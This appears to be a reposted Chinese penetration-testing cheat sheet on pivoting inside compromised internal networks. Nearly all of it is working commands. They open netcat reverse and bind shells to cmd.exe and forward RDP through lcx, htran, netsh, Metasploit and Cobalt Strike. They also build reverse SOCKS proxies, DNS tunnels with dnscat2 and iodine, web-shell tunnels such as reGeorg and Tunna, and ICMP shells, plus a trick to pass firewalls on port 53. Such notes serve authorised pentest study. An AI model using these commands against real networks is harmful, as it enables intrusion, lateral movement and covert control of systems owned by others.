内网端口转发小技巧
作者:互联网
端口转发
NC
反向连接
-
kali开启监听
nc -lnvp 7777
-
目标返向连接
nc -e cmd.exe 192.168.95.128 7777
- 可以执行命令
正向连接
-
目标开启监听
nc -l -p 5555 -e cmd.exe
-
kali连接
nc -nvv 192.168.95.12 5555
-
执行命令
lcx
外网无法访问内网,但内网可访问外网
-
client:转发自己的3389端口到远程端口7777上
lcx.exe -slave rhost rport(7777) lhost lport(3389)
-
attack: 转发本地的7777端口到5555上
portmap -m 2 -p1 7777 -p2 5555
我的kali跑不了
-
连接本地的5555端口:即可实现监听目标的3389
rdesktop 127.0.0.1:5555
转发内网端口
lcx.exe -tran lport(7777) rhost(192.168.93.10) rport(3389)
rdesktop 192.168.0.106:7777
端口转发 + 绕过防火墙
3389转到53端口上,attack连接53端口
lcx.exe -tran lport lhost lport
rdesktop rhost 53
netsh
windows自带规则配置工具
-
添加一条规则:将远程的3389端口转发到本地的7777端口上
netsh interface portproxy add v4tov4 listenport=7777 connect=3389 connectaddress=192.168.93.10 protocol=tcp
-
查看转发规则:
netsh interface portproxy dump
-
删除转发规则:
netsh interface portproxy delete v4tov4 listenport=7777
htran
绕过防火墙
-
方法1:
htran.exe -p -tran lport lhost lport
-
方法2:
htran.exe -p -slave rhost rport lhost lport
portmap -m 2 -p1 xxxx -p2 xxxx
转发内网端口
-
方法1:
htran.exe -p -tran lport rhost rport
-
方法2:
将本地(win2012)的3389转发到目标(win2008)的7777上
htran.exe -p -slave rhost(192.168.93.20) rport(7777) lhost(127.0.0.1) lport(3389)
在目标上(win2008)监听本地7777端口,转发到9999端口
htran.exe -p -listen 7777 9999
attack 连接(win2008)9999端口,相当于连接了win2012的3389:
rdesktop 192.168.0.106:9999
socat
-
转发内网端口
socket.exe TCP4-LISTEN:5555.reuseaddr.fork TCP4:192.168.93.10:3389
FPipe
- 转发内网端口
FPipe.exe -l lport -r rport rhost -v
portfwd
msf自带
- 生成一个监听
portfwd add -l 1389 -r 192.168.93.10 -p 3389
- 查看已建立的规则:
portfwd list
- 连接:
rdesktop 192.168.0.108:1389
(此处是msf的地址)
cobalt strike
-
cs生成一个客户端,将其拿到目标机器是上运行,拿到一个会话
-
然后进入交互模式
rportfwd 8888 rhost 3389
rportfwd stop 8888
rinetd
linux自带的一个文件,位于/etc/rinetd
- 当外部主机是linux时,可使用其进行转发操作
lhost lport rhost rport
ngrock
网络代理
socks代理
cobaltstrike
msf
- 添加路由:
run post/multi/manage/autoroute
- 查看路由:
run autoroute -p
- 添加socks代理:
use auxiliary/server/socks4a
- 使用代理链工具调用代理:
proxychains rdesktop 192.168.93.10
ew
- 正向代理
- 用法B(08):
ew_win32.exe -s ssocksd -l 1080
- 流量走向:A <··> B:1080 <··> C
- 反向代理
- win08本地流量转发:
ew_win32.exe -s rssocks -l 1080 -e 8888
- win12转发自身流量到08的8888端口:
ew_win32.exe -s rssocks -d 192.168.93.20 -e 8888
- kali连接:
proxychains rdesktop 192.168.93.10
- kali连接:
- 流量走向:A(kali) <··> B(08):1080 <··> B:8888 <··>C(12)
- 端口转发
- win08本地流量转发:
Termite(白蚁)
- 添加代理:
socks 1080
- 反弹一个shell:
shell 7777
DNS代理
dnscat2
- 服务端执行:
ruby dnscat2.rb --dns "domain=pentestlab,host=192.168.0.108" --no-cache
- 客户端连接:
dnscat2-v0.07-client-win32.exe --dns server=192.168.0.108
- 操作
- 查看所有的会话:
windows
- 与指定会话交互:
session -i
- 与指定会话交互:
- 得到一个shell:
shell
- 转到主界面:
ctrl+z
- 转到主界面:
iodine
备选,遇linux主机可一试
- 服务端执行:
iodined -p 123456 -f -DD 192.168.0.108 abc.com
- 客户端:
iodine -p 123456 -f -r -T TXT 192.168.0.108 abc.com
HTTP代理
ReDuh(不太好用)
java -jar reDuhClient.jar http://192.168.0.108/reduh.jsp
nc -w localhost 1010
[create Tunnel]1234:127.0.0.1:3389
Tunna
- 把代理脚本上传到目标服务器,然后通过代理内网的某个端口,将敏感端口流量转发了外网的的某个端口,再通过本地连接外网的端口进行连接。
- 将代理脚本上传到目标服务器,在浏览器访问代理脚本是否被解析
python proxy.py -u http://192.168.0.108/conn.php -l 4444 -r 3389 -s -v --no-socks
- 本地执行:
rdesktop 127.0.0.1:4444
reGeorg
-
Neo-reGeorg (支持客户端的加密)
- 设置密码并生成隧道文件:
python neoreg py generate -k Scantime
- 设置密码并生成隧道文件:
-
将隧道文件放到目标服务器的web目录,连接web服务器并建立本地socks代理:
python neoreg.py -k scantime -u http://192.168.0.108/tunnel.php
- Socks连接工具连接本地
ICMP代理
-
运行前执行:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
-
服务端:
icmpsh_m.py lhost rhost
- 客户端:
icmpsh.exe -t serverhost
- 客户端:
标签:exe,技巧,端口,192.168,3389,7777,转发 来源: https://blog.csdn.net/qq_43271194/article/details/110393574